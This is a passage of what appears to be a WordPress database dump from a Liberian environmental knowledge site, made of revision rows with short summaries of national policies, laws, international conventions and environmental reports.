Strategy','','inherit','closed','closed','','1724-revision-v1','','','2022-12-06 10:43:36','2022-12-06 10:43:36','',1724,'https://ekmsliberia.info/?p=5191',0,'revision','',0),(5192,42,'2022-12-06 10:44:01','2022-12-06 10:44:01','An Act to establish a legal framework for the sustainable development, management and\r\nprotection of the environment by the Environment Protection Agency in partnership with\r\nregulated Ministries and organizations and in a close and responsive relationship with the\r\npeople of Liberia; and to provide high quality information and advice on the state of the\r\nenvironment and for matters connected therewith.\r\n\r\nWHEREAS Article 9 of Chapter II of the 1986 Constitution of Liberia also encourages bilateral and regional co-operation and Liberian is party of treaty law and is a member of international and regional organizations for the attainment of the global protection of the environment and the promotion of sustainable use of natural resources;\r\n\r\nAND WHEREAS it is acknowledged that Liberia\'s biodiversity plays a crucial role in\r\nmaintaining global ecological cycles;\r\n\r\nAND WHEREAS it is desirable to provide a legal framework for the protection and management\r\nof Liberia\'s environment, its cooperation with other countries and membership in relevant\r\ninternational organizations;','Environment Protection and Management Law of the Republic of Liberia','','inherit','closed','closed','','1722-revision-v1','','','2022-12-06 10:44:01','2022-12-06 10:44:01','',1722,'https://ekmsliberia.info/?p=5192',0,'revision','',0),(5193,42,'2022-12-06 10:44:59','2022-12-06 10:44:59','The UNFCCC entered into force on 21 March 1994. Today, it has near-universal membership. The 197 countries that have ratified the Convention are called Parties to the Convention.\r\n\r\nThe UNFCCC is a “Rio Convention”, one of three adopted at the “Rio Earth Summit” in 1992. Its sister Rio Conventions are the UN Convention on Biological Diversity and the Convention to Combat Desertification. The three are intrinsically linked. It is in this context that the Joint Liaison Group was set up to boost cooperation among the three Conventions, with the ultimate aim of developing synergies in their activities on issues of mutual concern. It now also incorporates the Ramsar Convention on Wetlands.\r\n\r\nPreventing “dangerous” human interference with the climate system is the ultimate aim of the UNFCCC.','Convention Text - UNFCCC','','inherit','closed','closed','','1780-revision-v1','','','2022-12-06 10:44:59','2022-12-06 10:44:59','',1780,'https://ekmsliberia.info/?p=5193',0,'revision','',0),(5194,42,'2022-12-06 10:45:22','2022-12-06 10:45:22','Established in 1994, the United Nations Convention to Combat Desertification (UNCCD) is the sole legally binding international agreement linking environment and development to sustainable land management. The Convention addresses specifically the arid, semi-arid and dry sub-humid areas, known as the drylands, where some of the most vulnerable ecosystems and peoples can be found.','Convention Text - UNCCD','','inherit','closed','closed','','1778-revision-v1','','','2022-12-06 10:45:22','2022-12-06 10:45:22','',1778,'https://ekmsliberia.info/?p=5194',0,'revision','',0),(5195,42,'2022-12-06 10:45:42','2022-12-06 10:45:42','The objectives of this Convention, to be pursued in accordance with its relevant provisions, are the conservation of biological diversity, the sustainable use of its components and the fair and equitable sharing of the benefits arising out of the utilization of genetic resources, including by appropriate access to genetic resources and by appropriate transfer of relevant technologies, taking into account all rights over those resources and to technologies, and by appropriate funding.','Convention Text - UNCBD','','inherit','closed','closed','','1776-revision-v1','','','2022-12-06 10:45:42','2022-12-06 10:45:42','',1776,'https://ekmsliberia.info/?p=5195',0,'revision','',0),(5196,42,'2022-12-06 10:46:01','2022-12-06 10:46:01','Land in Liberia’s humid subtropics is particularly well suited to cocoa, a crop for which strong demand has been consistently forecast since the early 1990s. Solid prices for this export crop are projected to accompany growth in demand until at least 2030.\r\n\r\nLiberia enjoys two complementary assets with a potential for phenomenal growth once properly leveraged: fertile land and experienced cocoa farmers. Currently both assets are undervalued and captive to trends in under investment. Where farmers previously managed cocoa farms as businesses, ageing non-productive trees and a deterioration of trust in value chain participants has obliged farmers to favor subsistence agriculture over cocoa cultivation.\r\n\r\nThe Government of Liberia’s Ministry of Agriculture proposes that cocoa farmers revitalize the sector following various reforms such as market liberalization. This National Development Cocoa Strategy proposes Ministry-led, ways and means of reducing poverty through cocoa cultivation, and increasing food security in rural areas by tripling real income received from cocoa over the next five to eight years.','National Cocoa Development Strategy','','inherit','closed','closed','','1774-revision-v1','','','2022-12-06 10:46:01','2022-12-06 10:46:01','',1774,'https://ekmsliberia.info/?p=5196',0,'revision','',0),(5197,42,'2022-12-06 10:46:57','2022-12-06 10:46:57','The Comprehensive Assessment of the Agricultural Sector of Liberia (CAAS-Lib) was launched by the Government of Liberia, with assistance from the Food and Agriculture Organization of the United Nations (FAO), the World Bank and the International Fund for Agricultural Development (IFAD), to provide a vision and policy and programme options for the agricultural sector and for food security, and also to help the sector institutions prepare themselves for the transition to nation-building after nearly 14 years of war and destruction of life and property. The review comes at a time of transition from war to peace and nation building by the recent process of democratic elections and also the Millennium Development Goal (MDG) that calls for halving of the number of poor and hungry people by 2015.\r\n\r\nAs a sub-sector report contributing to the overall review, the main tasks of this study are to: review information on the resource base and analyse the land and water sector data, bearing in mind the environmental issues; review past and present water development and management projects with regard to water control and soil conservation; analyse options for development of water and soil conservation projects as priority investments; review planned overlapping activities in the sector and formulate implementation strategies.','Comprehensive Assessment of the Agriculture Sector in Liberia','','inherit','closed','closed','','1772-revision-v1','','','2022-12-06 10:46:57','2022-12-06 10:46:57','',1772,'https://ekmsliberia.info/?p=5197',0,'revision','',0),(5198,42,'2022-12-06 10:47:32','2022-12-06 10:47:32','With the publication of this Food Security and Nutrition Strategy (FSNS), the\r\ngovernment of the Republic of Liberia declares the commitments it will undertake and the\r\nactivities that it will put in motion to substantially reduce food insecurity and improve\r\nnutrition in the country in the next eight years. Government recognizes that to further its\r\nambitions of peace, reconciliation, stability, and development, the nation as a whole and each Liberian household must achieve food security and improved nutrition. Certainly, the\r\nLiberian economy rests heavily on the food security and the nutritional well-being of its\r\ncitizens. By ensuring that all its citizens have reliable physical and economic access to\r\nsufficient safe and nutritious food to meet their dietary needs and food preferences,\r\ngovernment will be laying a strong foundation for not only a prosperous nation, but also a\r\nmore peaceful and secure nation.\r\n\r\nThe key objectives of the FSNS are to make certain that all Liberians have reliable access\r\nto the food they need and are able to utilize that food to live active and healthy lives. As\r\nsuch, ensuring food security and good nutrition is not a policy choice of government that it\r\ncan decide to accept or reject, but a right of the citizens of Liberia which the government is obligated to respect, promote, and protect.','National Food Security and Nutrition Strategy','','inherit','closed','closed','','1770-revision-v1','','','2022-12-06 10:47:32','2022-12-06 10:47:32','',1770,'https://ekmsliberia.info/?p=5198',0,'revision','',0),(5199,42,'2022-12-06 10:48:06','2022-12-06 10:48:06','Read all the Ministry of Agriculture (MOA) Chemical Policies, guides, and Reports.','Chemical Policy Documents','','inherit','closed','closed','','1768-revision-v1','','','2022-12-06 10:48:06','2022-12-06 10:48:06','',1768,'https://ekmsliberia.info/?p=5199',0,'revision','',0),(5200,42,'2022-12-06 10:48:21','2022-12-06 10:48:21','Read all the Ministry of Agriculture (MOA) Chemical Policies, guides, and Reports.','Chemical Policy Documents','','inherit','closed','closed','','1768-autosave-v1','','','2022-12-06 10:48:21','2022-12-06 10:48:21','',1768,'https://ekmsliberia.info/?p=5200',0,'revision','',0),(5201,42,'2022-12-06 10:49:10','2022-12-06 10:49:10','At the request of the Environmental Protection Agency of Liberia (EPA), UNEP conducted a technical mission to study both the technical and institutional issues associated with solid waste management in Liberia. The mission was hosted by the EPA and undertaken between 17– 27 June 2007. This report summarizes its findings.\r\n\r\nThe primary task of this exercise was to undertake, in consultation with the EPA, a review of the Solid Waste Management Sector of Liberia.','Assessment of Solid Waste Management in Liberia','','inherit','closed','closed','','1751-revision-v1','','','2022-12-06 10:49:10','2022-12-06 10:49:10','',1751,'https://ekmsliberia.info/?p=5201',0,'revision','',0),(5202,42,'2022-12-06 10:49:29','2022-12-06 10:49:29','This publication is a summary of several larger reports, which were produced by ASM-PACE in collaboration with the Program on Forests (PROFOR) and the World Bank. ASM-PACE is a multi-partner program that began as a partnership between Estelle Levin Limited and World Wide Fund for Nature (also known as the World Wildlife Fund) to address the environmental impacts of artisanal and small-scale mining (ASM) in some of the world’s most important ecosystems, particularly protected areas and critical ecosystems (PACE).\r\n\r\nWith support from PROFOR and the Oil, Gas, and Mining Unit (SEGOM), the World Bank’s Africa regional staff contracted the ASM-PACE Program to analyze the impacts of artisanal mining activities on high-value natural landscapes and the people who live nearby. The case studies, a global solutions study, and a methodological toolkit offer recommendations on how to reconcile socioeconomic development based on artisanal mining and preservation of important ecological sites. The global study looked at 36 countries and found that artisanal and small-scale mining was taking place either inside or along the borders of 96 out of 147 protected areas in those countries. In the end, the project looked in more depth at experiences in five African countries. This report focuses on three of these: Gabon, Liberia, and Madagascar.','Artisanal Mining in Critical Ecosystems: a look at Gabon, Liberia, and Madagascar','','inherit','closed','closed','','1749-revision-v1','','','2022-12-06 10:49:29','2022-12-06 10:49:29','',1749,'https://ekmsliberia.info/?p=5202',0,'revision','',0),(5203,42,'2022-12-06 10:49:51','2022-12-06 10:49:51','Improving access to food through broad-based participation in income-generating activities in key agricultural supply chains, together with the development of safety nets that protect the welfare of Liberia’s diverse types of vulnerable individuals and households represent two of the major food security challenges facing the Liberian government after fourteen years of civil conflict. Responding to these challenges will depend largely on how the government responds to five major challenges in transitioning from an emergency situation to one focused on long-term development: 1) resettling IDPs and reintegrating ex-combatants; 2) reducing the real cost of food; 3) improving macroeconomic management and governance; 4) generating broad-based growth in rural incomes through smallholder development; and 5) developing public sector capacity to analyze, plan, prioritize, coordinate and monitor policies and programs. Success in addressing these issues may depend largely on the ability to go beyond strictly technical responses to develop innovative actions that take into account the numerous and complex socio-political factors existing in the country in the post-conflict period.','Agricultural policy and food security in Liberia','','inherit','closed','closed','','1745-revision-v1','','','2022-12-06 10:49:51','2022-12-06 10:49:51','',1745,'https://ekmsliberia.info/?p=5203',0,'revision','',0),(5204,42,'2022-12-06 10:50:10','2022-12-06 10:50:10','Liberia’s climate is favorable for farming, it has vast forests and an abundance of water, all of which provide a basis for increased agricultural development, as well as manufacturing\r\nand processing of its own produce. Agriculture is a major sector of Liberia’s economy, worth 38.8% of GDP, employs 67% of the workforce, and provides valuable export opportunities.\r\n\r\nThe country has re-calibrated its economic policy to one of Economic Diversification and Inclusive Growth through Agriculture, Agro-Processing and Manufacturing. The new\r\neconomic policy, “Liberia Agricultural Transformation Agenda (LATA),” adapts an export-driven approach and focuses on six agro-clusters, or sectors, moving away from raw commodities to manufacturing and processing of priority value chains — cocoa, rubber, oil palm, fisheries &amp; aquaculture, rice and cassava.','Liberia: Invest Agriculture','','inherit','closed','closed','','1743-revision-v1','','','2022-12-06 10:50:10','2022-12-06 10:50:10','',1743,'https://ekmsliberia.info/?p=5204',0,'revision','',0),(5205,42,'2022-12-06 10:51:31','2022-12-06 10:51:31','This Act is cited as The Liberia Seed Development and Certification Agency Act','Liberia Seed Development and Certification Agency Act','','inherit','closed','closed','','1741-revision-v1','','','2022-12-06 10:51:31','2022-12-06 10:51:31','',1741,'https://ekmsliberia.info/?p=5205',0,'revision','',0),(5206,42,'2022-12-06 10:51:56','2022-12-06 10:51:56','AN ACT TO AMEND CHAPTER 28 OF THE EXECUTIVE LAW OF 1972, TO PROVIDE FOR THE ESTABLISHMENT OF LIBERIA PLANT PROTECTION REGULATORY SERVICES BUREAU WITHIN THE MINISTRY OF AGRICULTURE','Liberia Plant Protection Regulatory Services Act','','inherit','closed','closed','','1739-revision-v1','','','2022-12-06 10:51:56','2022-12-06 10:51:56','',1739,'https://ekmsliberia.info/?p=5206',0,'revision','',0),(5207,42,'2022-12-06 10:52:15','2022-12-06 10:52:15','AN ACT TO AMEND CHAPTER 28 OF THE EXECUTIVE LAW OF 1972, TO PROVIDE FOR THE ESTABLISHMENT OF THE LIBERIA FERTILIZER REGULATORY DIVISION, WITHIN THE MINISTRY OF AGRICULTURE','Liberia Fertilizer Regulatory Division Act','','inherit','closed','closed','','1737-revision-v1','','','2022-12-06 10:52:15','2022-12-06 10:52:15','',1737,'https://ekmsliberia.info/?p=5207',0,'revision','',0),(5208,42,'2022-12-06 10:52:35','2022-12-06 10:52:35','This section of the report is an abbreviated version of the records of the county consultative meetings held between March and April 2010. It provides information on the Land Commission, the consultative meetings, the views of participants on land issues, the key recommendations and their linkage to the program areas of the Land Commission.\r\n\r\nThe Land Commission (LC) was established by an Act of the National Legislature of Liberia in August 2009 and has a life span of 5 years. It is an autonomous agency that is structured with seven commissioners at the strategic apex. Each commissioner is from a different county; appointed by the President and confirmed by the Liberian Senate. In addition to the commissioners, there is a technical secretariat which provides technical and administrative support to the Commission.\r\n\r\nThe mandate of the Commission is to ‘Propose, advocate and coordinate reforms of land policy, laws and programs in Liberia’. Contrary to the widely held public view and perception, the LC does not have adjudicatory powers or an implementation role.','Land Commission Consultation Report - 2010','','inherit','closed','closed','','1734-revision-v1','','','2022-12-06 10:52:35','2022-12-06 10:52:35','',1734,'https://ekmsliberia.info/?p=5208',0,'revision','',0),(5209,42,'2022-12-06 10:53:15','2022-12-06 10:53:15','The main purpose of this report is to propose an infrastructure planning strategy for Liberia that contributes to national and regional integration in a manner that secures peace and stability for the long term future. It specifically aims at formulating an investment approach that is explicitly cognizant of Liberia’s status as a fragile state so as to promote inclusive growth and avoid a recurrence of conflict in the future, as well as enabling Liberia to deepen its links with MRU and ECOWAS neighbors, thereby enhancing the development benefits which can accrue from regional integration.\r\n\r\nThe study examines and is built around three major themes: (i) stability, (ii) regional integration, and (iii) the infrastructure gaps in Liberia. The issue of stability is a central concern that takes into account the extent of human harm and physical damage which the nation suffered during its fourteen years conflict. This theme informs the choice of growth strategies that will foster an era of inclusive and transformational growth. The report assesses the drivers of the original conflict and the vulnerabilities which remain as a basis for prioritizing infrastructure investment that delivers the inclusive growth which Liberia now requires.','Liberia: Infrastructure and Inclusive Growth','','inherit','closed','closed','','1732-revision-v1','','','2022-12-06 10:53:15','2022-12-06 10:53:15','',1732,'https://ekmsliberia.info/?p=5209',0,'revision','',0),(5210,42,'2022-12-06 10:53:35','2022-12-06 10:53:35','This Land Rights Policy concerns four land rights categories (Public Land, Government Land, Customary Land, and Private Land), and a cross-cutting sub-category called Protected Areas, which must be conserved for the benefit of all Liberians. For Public Land and Government Land, the Policy sets forth critical policy recommendations regarding: how the Government transfers such land, and how the Government acquires land, especially through the exercise of eminent domain (i.e. forced acquisition). With respect to the new category of Customary Land, there are several significant recommendations: Customary Land and Private Land are equally protected; and communities will self-define, be issued a deed, establish a legal entity, and strengthen their governance arrangements to make them fully representative and accountable. The Government also undertakes to support communities in implementing these recommendations. Finally, several Private Land issues are detailed, which include loss of ownership, leases, easements, and adverse possession.','Land Rights Policy','','inherit','closed','closed','','1730-revision-v1','','','2022-12-06 10:53:35','2022-12-06 10:53:35','',1730,'https://ekmsliberia.info/?p=5210',0,'revision','',0),(5211,42,'2022-12-06 10:53:54','2022-12-06 10:53:54','This is an act to amend Title 12, Executive law of the Liberian Code of law revised and to add thereto a New Chapter creating the Liberia Land Authority.','The Liberia Land Authority Act','','inherit','closed','closed','','1728-revision-v1','','','2022-12-06 10:53:54','2022-12-06 10:53:54','',1728,'https://ekmsliberia.info/?p=5211',0,'revision','',0),(5212,42,'2022-12-06 10:55:04','2022-12-06 10:55:04','EXECUTIVE SUMMARY\r\nA large mammal survey was carried out in Wonegizi from 21.11.-10.12.19 under FFI’s\r\nWonegizi REDD+ Project in order to provide baseline data against which biodiversity\r\nobjectives may be monitored, as well as to inform the project on the connectivity between\r\nZiama, Wonegizi and Wologizi PPAs for large mammals to understand how such species are\r\nmoving through the landscape and to provide recommendations for the establishment and\r\nmanagement of wildlife corridors.\r\nThe survey focused on 31 medium to large sized mammal species with an emphasis on\r\nindicator species of global conservation concern. A combination of data collection methods\r\nwas used, including desk review, interview surveys, reconnaissance surveys, HCV-species\r\ntargeted surveys, as well as Forest Elephant and Pygmy Hippo dung sample collection. Field\r\nsurveys were carried out in two different study areas, one in central Wonegizi and one in the\r\nnorthern part of the PPA. For the corridor assessment potential sites were identified per\r\nsatellite imagery and evaluated in the field through local information and ground-truthing of\r\nforest cover, connectivity, extent of human impact and forest degradation.\r\nThe resident large mammal fauna of Wonegizi consists of 24 species, including the Western\r\nChimpanzee, seven monkey species, the Forest Elephant, Pygmy Hippo, Leopard, African\r\nGolden Cat, Bongo, Bushbuck, five duiker species, the Water Chevrotain, Red River Hog,\r\nGiant Ground Pangolin, Black-bellied and White-bellied Pangolin. Another four species, i.e.\r\nthe Putty-nosed Monkey, Green Monkey, Forest Buffalo and Zebra Duiker might be present\r\nas well, but uncommon, i.e. either occur only occasionally and localized, or being very rare if\r\nnot already extinct today. The forest profile of Wonegizi generally is dominated by small to\r\nmedium sized trees and largely lacks a contiguous closed high canopy, hence it is not the\r\nmost suitable habitat for “High Forest”-dependent species such as the Red Colobus Monkey,\r\nKing Colobus and Diana Monkey, which appear to be rare and restricted to specific areas in\r\nWonegizi. The Jentink’s Duiker, another High Forest species, is absent from Wonegizi.','LARGE MAMMAL RAPID BIODIVERSITY ASSESSMENT in the Wonegizi REDD+ Project Site','','inherit','closed','closed','','3226-revision-v1','','','2022-12-06 10:55:04','2022-12-06 10:55:04','',3226,'https://ekmsliberia.info/?p=5212',0,'revision','',0),(5213,42,'2022-12-06 10:55:22','2022-12-06 10:55:22','Liberia is already bearing the brunt of climate change and recognizes both the current and future climate change associated risks and has committed to a 10% reduction in GHG emissions by 2030 to be achieved via a long-term strategy for attaining carbon neutrality by 2050. Liberia is committed to do more to further cut down on its GHG emissions with support from the international community.\r\n\r\nIt has ratified several protocols and submitted the Initial National Communications (INC) to the UNFCCC in 2013. In 2015 Liberia submitted its INDC, a gesture of its ambition to use nature-based approaches to reduce GHG emissions in light of its domestic circumstances and capabilities. More recently, Liberia ratified the Paris Agreement on climate change1 in which the Enhanced Transparency Framework was established (Article 13) to help understand, compare, harmonize and track national and global commitments in fighting climate change. The “transparency framework” requires countries to regularly provide: (i) A national inventory of greenhouse gas emissions (by sources) and removals (by sinks) (ii) Information necessary to track progress toward achieving their Nationally Determined Contribution (NDC) (iii) Information related to climate change impacts and adaptation (iv) Information on financial, technology transfer and capacity building support needed and received and (v) Information on any support they provide to developing countries. GEF established and operationalized the Capacity Building Initiative for Transparency (CBIT) to support developing countries to prepare to meet the enhanced transparency requirements of the agreement in both the pre- and post-2020 period based on the Paris Agreement. Liberia’s PIF for a project titled “Building and strengthening Liberia’s national capacity to implement the transparency elements of the Paris\r\nAgreement” was submitted and approved by GEF. This was followed by GEF approval of a Project Preparation Grant (PPG) for this project to be implemented by the Liberia Environmental Protection Agency (EPA) and Conservation International (CI).','CBIT Project Document','','inherit','closed','closed','','2751-revision-v1','','','2022-12-06 10:55:22','2022-12-06 10:55:22','',2751,'https://ekmsliberia.info/?p=5213',0,'revision','',0),(5214,42,'2022-12-06 10:55:41','2022-12-06 10:55:41','This publication is an output of the Technology Needs Assessment project, funded by the Global Environment Facility (GEF) and implemented by the United Nations Environment Programme (UN Environment) and the UNEP DTU Partnership (UDP) in collaboration with University of Cape Town. The views expressed in this publication are those of the authors and do not necessarily reflect the views of UNEP DTU Partnership, UN Environment or University of Cape Town. We regret any errors or omissions that may have been unwittingly made. This publication may be reproduced in whole or in part and in any form for educational or non-profit services without special permission from the copyright holder, provided acknowledgement of the source is made. No use of this publication may be made for resale or any other commercial purpose whatsoever without prior permission in writing from the UNEP DTU Partnership.','Technology Needs Assessment Agriculture Report June 2019','','inherit','closed','closed','','2991-autosave-v1','','','2022-12-06 10:55:41','2022-12-06 10:55:41','',2991,'https://ekmsliberia.info/?p=5214',0,'revision','',0),(5215,42,'2022-12-06 10:56:23','2022-12-06 10:56:23','This publication is an output of the Technology Needs Assessment project, funded by the Global Environment Facility (GEF) and implemented by the United Nations Environment Programme (UN Environment) and the UNEP DTU Partnership (UDP) in collaboration with University of Cape Town. The views expressed in this publication are those of the authors and do not necessarily reflect the views of UNEP DTU Partnership, UN Environment or University of Cape Town. We regret any errors or omissions that may have been unwittingly made. This publication may be reproduced in whole or in part and in any form for educational or non-profit services without special permission from the copyright holder, provided acknowledgement of the source is made. No use of this publication may be made for resale or any other commercial purpose whatsoever without prior permission in writing from the UNEP DTU Partnership.','Technology Needs Assessment Agriculture Report June 2019','','inherit','closed','closed','','2991-revision-v1','','','2022-12-06 10:56:23','2022-12-06 10:56:23','',2991,'https://ekmsliberia.info/?p=5215',0,'revision','',0),(5216,42,'2022-12-06 10:57:17','2022-12-06 10:57:17','News and Stories highlighting the work of the Environmental Protection Agency (EPA) over the period in Liberia','EPA Newsletter April 2019 Edition','','inherit','closed','closed','','2296-revision-v1','','','2022-12-06 10:57:17','2022-12-06 10:57:17','',2296,'https://ekmsliberia.info/?p=5216',0,'revision','',0),(5217,42,'2022-12-06 10:57:37','2022-12-06 10:57:37','News and Stories highlighting the work of the Environmental Protection Agency (EPA) over the period in Liberia','EPA Newsletter December 2018 Edition','','inherit','closed','closed','','2293-revision-v1','','','2022-12-06 10:57:37','2022-12-06 10:57:37','',2293,'https://ekmsliberia.info/?p=5217',0,'revision','',0),(5218,42,'2022-12-06 10:58:00','2022-12-06 10:58:00','An overview of development and how it affects Liberia.','UNFCCC Developments between COP24 and COP25','','inherit','closed','closed','','2252-revision-v1','','','2022-12-06 10:58:00','2022-12-06 10:58:00','',2252,'https://ekmsliberia.info/?p=5218',0,'revision','',0),(5219,42,'2022-12-06 10:58:38','2022-12-06 10:58:38','The state of the environment report is a guide for development planning and decision-making and is an important reference for environmental education and awareness. It is expected to serve as a monitoring tool for measuring progress against stated development goals. . Within the environmental domain, there are serious data gaps related to Liberia’s biodiversity, mountains, solid waste management, and greenhouse gas emissions, among others.','State of the Environment','','inherit','closed','closed','','2248-revision-v1','','','2022-12-06 10:58:38','2022-12-06 10:58:38','',2248,'https://ekmsliberia.info/?p=5219',0,'revision','',0),(5220,42,'2022-12-06 10:59:10','2022-12-06 10:59:10','The National Energy Policy (NEP) is the product of an extensive process of consultations that started with the National Energy Stakeholders Forum (NESF) in October 2006. Recommendations from that forum were summarized in the National Energy Sector White Paper published in February 2007. After a process of scrutiny and validation involving all key stakeholders, the White Paper has now been transformed into the NEP.','National Energy Policy','','inherit','closed','closed','','2178-revision-v1','','','2022-12-06 10:59:10','2022-12-06 10:59:10','',2178,'https://ekmsliberia.info/?p=5220',0,'revision','',0),(5221,42,'2022-12-06 11:00:27','2022-12-06 11:00:27','Liberia’s INDC presents a context for the global effort to create a new international climate agreement by the end of the Paris Climate Summit in December 2015, in order to limit temperature increase to 2°C. Liberia recognizes the current and future threats of climate change and has been taking initiatives toward addressing these threats.','Intended Nationally Determined Contributions of Liberia','','inherit','closed','closed','','2161-revision-v1','','','2022-12-06 11:00:27','2022-12-06 11:00:27','',2161,'https://ekmsliberia.info/?p=5221',0,'revision','',0),(5222,42,'2022-12-06 11:00:46','2022-12-06 11:00:46','The Agenda for Transformation (AfT) is the Government of Liberia’s five-year development strategy. It follows the Lift Liberia Poverty Reduction Strategy (PRS), which raised Liberia from post-conflict emergency reconstruction and positioned it for future growth.','Agenda for Transformation','','inherit','closed','closed','','2159-revision-v1','','','2022-12-06 11:00:46','2022-12-06 11:00:46','',2159,'https://ekmsliberia.info/?p=5222',0,'revision','',0),(5223,42,'2022-12-06 11:01:07','2022-12-06 11:01:07','An IPCC special report on the impacts of global warming of 1.5 °C above pre-industrial levels and related global greenhouse gas emission pathways, in the context of strengthening the global response to the threat of climate change, sustainable development, and efforts to eradicate poverty.','IPCC Intergovernmental Panel on Climate Change','','inherit','closed','closed','','2156-revision-v1','','','2022-12-06 11:01:07','2022-12-06 11:01:07','',2156,'https://ekmsliberia.info/?p=5223',0,'revision','',0),(5224,42,'2022-12-06 11:01:27','2022-12-06 11:01:27','Liberia’s Initial National Communication (INC) is in compliance with decision 17 CP/8; guidelines for the preparation of national communications from Parties not included in Annex I to the Convention from 23 October to 1 November 2002.','Liberia Initial National Communication','','inherit','closed','closed','','2154-revision-v1','','','2022-12-06 11:01:27','2022-12-06 11:01:27','',2154,'https://ekmsliberia.info/?p=5224',0,'revision','',0),(5225,42,'2022-12-06 11:01:47','2022-12-06 11:01:47','An Act to establish a monitoring, coordinating and supervisory authority for the sustainable management of the environment in partnership with regulated Ministries and organizations and in a close and responsive relationship with the people of Liberia; and to provide high quality information and advice on the state of the environment and for matters connected therewith.','An Act Creating the EPA','','inherit','closed','closed','','2152-revision-v1','','','2022-12-06 11:01:47','2022-12-06 11:01:47','',2152,'https://ekmsliberia.info/?p=5225',0,'revision','',0),(5226,42,'2022-12-06 11:02:39','2022-12-06 11:02:39','The impacts of climate change are even more evident and pervasive with increased occurrences of flooding across the country, changes in climatic conditions, as well as low agricultural yields in Liberia and other parts of the world. Undeniably, climate change is a major environmental threat facing the social and economic development of Less Developed Countries like ours being more vulnerable to the impacts due to their low capacity to adapt to the impact of Climate Change.','National Policy and Reform Strategy on Climate Change','','inherit','closed','closed','','2150-revision-v1','','','2022-12-06 11:02:39','2022-12-06 11:02:39','',2150,'https://ekmsliberia.info/?p=5226',0,'revision','',0),(5227,42,'2022-12-06 11:02:56','2022-12-06 11:02:56','An Act to establish the Land Rights Law of 2018, Republic of Liberia','Signed Land Rights Act','','inherit','closed','closed','','2148-revision-v1','','','2022-12-06 11:02:56','2022-12-06 11:02:56','',2148,'https://ekmsliberia.info/?p=5227',0,'revision','',0),(5228,42,'2022-12-06 11:03:17','2022-12-06 11:03:17','This publication on the occasion of the Rio+20 Conference highlights the roles of the Rio Conventions’ processes involved in biodiversity, combating desertification/land degradation and climate change as important contributors to the global sustainable development agenda, drawing attention to successes and future opportunities.','The RIO Conventions Action on ADAPTATION','','inherit','closed','closed','','1782-revision-v1','','','2022-12-06 11:03:17','2022-12-06 11:03:17','',1782,'https://ekmsliberia.info/?p=5228',0,'revision','',0),(5229,42,'2022-12-06 11:04:02','2022-12-06 11:04:02','The Montreal Protocol on Substances that Deplete the Ozone Layer is a land mark agreement that identified the major ozone depleting substances (ODS) and established a time table for their eventual phase out.','Montreal Protocol on Substances that Deplete the Ozone Layer','','inherit','closed','closed','','3265-revision-v1','','','2022-12-06 11:04:02','2022-12-06 11:04:02','',3265,'https://ekmsliberia.info/?p=5229',0,'revision','',0),(5230,42,'2022-12-06 11:04:25','2022-12-06 11:04:25','The Capacity Building Initiative for Transparency( CBIT)<b>, </b>came into fruition as a result of the  Paris Agreement on Climate Change which primarily  rests upon a foundation of Nationally Determined Contributions (NDCs) originally submitted by Parties to the Convention in 2015, and formally adopted on November 4, 2016.','An Overview of Liberia’s Capacity Building Initiative for Transparency (CBIT)','','inherit','closed','closed','','3267-revision-v1','','','2022-12-06 11:04:25','2022-12-06 11:04:25','',3267,'https://ekmsliberia.info/?p=5230',0,'revision','',0),(5231,42,'2022-12-06 11:04:49','2022-12-06 11:04:49','The Stockholm Convention was adopted by the Conference of Plenipotentiaries on 22 May 2001 in the City of Stockholm, Sweden.','Implementation of Stockholm Convention in Liberia','','inherit','closed','closed','','3269-revision-v1','','','2022-12-06 11:04:49','2022-12-06 11:04:49','',3269,'https://ekmsliberia.info/?p=5231',0,'revision','',0),(5232,42,'2022-12-06 11:05:18','2022-12-06 11:05:18','Technology Needs Assessments are a set of activities that identify and analyze climate change mitigation and adaptation technology priorities of developing countries.','Technology Needs Assessment Project','','inherit','closed','closed','','3273-revision-v1','','','2022-12-06 11:05:18','2022-12-06 11:05:18','',3273,'https://ekmsliberia.info/?p=5232',0,'revision','',0),(5233,42,'2022-12-06 11:06:19','2022-12-06 11:06:19','Established in 1994, UNCCD is the sole legally-binding international agreement linking environment and development to sustainable land management.','Overview of The UNCCD, and Implementation in Liberia','','inherit','closed','closed','','3275-revision-v1','','','2022-12-06 11:06:19','2022-12-06 11:06:19','',3275,'https://ekmsliberia.info/?p=5233',0,'revision','',0),(5234,42,'2022-12-06 11:10:00','2022-12-06 11:10:00','Global agreement on hazardous wastes and other wastes','Basel Convention on the Control of Transboundary Movements of Hazardous Wastes and their Disposal','','inherit','closed','closed','','3247-revision-v1','','','2022-12-06 11:10:00','2022-12-06 11:10:00','',3247,'https://ekmsliberia.info/?p=5234',0,'revision','',0),(5235,42,'2022-12-06 11:10:20','2022-12-06 11:10:20','The population of Monrovia is increasing accompanied by rapid urbanization. Due to rapid urbanization, economic development, higher living standards and changes in consumption patterns and lifestyle, the generation rate of waste has increased. Mismanagement of solid waste tends to hinder any progress towards environmental sustainability. This study endeavored to determine the adequacy of waste management services in the city, explore the linkage between population and development and the increase in the generation of wastes.\r\n\r\nThe study assessed both qualitatively and quantitatively behavioral factors including knowledge, attitude and practices of solid waste management, collaboration among stakeholders, and challenges related to sustainable waste management in Monrovia. Households were selected randomly (simple and stratified) to show the socio-economic groups in the city. Purposive sampling was used to identify key informants or personnel in charge of waste management and the use of questionnaires captured vital information on waste management in the city.\r\n\r\nThe major findings showed the main proportion of waste generated in Monrovia was organic refuse (40.2%) followed by plastic (14.2%). Waste generated are inadequately disposed of due to the inadequate collection system, as large fragment of waste remain uncollected resulting in open dumping and burning of wastes. These waste management challenges have become heightened as a result of insufficient technology to ensure proper management, low budgetary allocations for effective waste management, lack of skilled professionals, poor implementation of\r\nregulations to ensure adequate management, and poor public awareness.','Solid Waste Management in Monrovia','','inherit','closed','closed','','2658-revision-v1','','','2022-12-06 11:10:20','2022-12-06 11:10:20','',2658,'https://ekmsliberia.info/?p=5235',0,'revision','',0),(5236,42,'2022-12-06 11:10:41','2022-12-06 11:10:41','The Pro-Poor Agenda for Prosperity and Development 2018 to 2023 (PAPD) is the second in the series of 5-year National Development Plans (NDP) anticipated under the Liberia Vision 2030 framework. It follows the Agenda for Transformation 2012-2017 (AfT). It is informed as well by lessons learned from the implementation of the Interim Poverty Reduction Strategy 2007 (iPRS) and the Poverty Reduction Strategy (2008-2011).','Pro Poor Agenda for Prosperity and Development','','inherit','closed','closed','','2309-revision-v1','','','2022-12-06 11:10:41','2022-12-06 11:10:41','',2309,'https://ekmsliberia.info/?p=5236',0,'revision','',0),(5237,42,'2022-12-06 11:11:24','2022-12-06 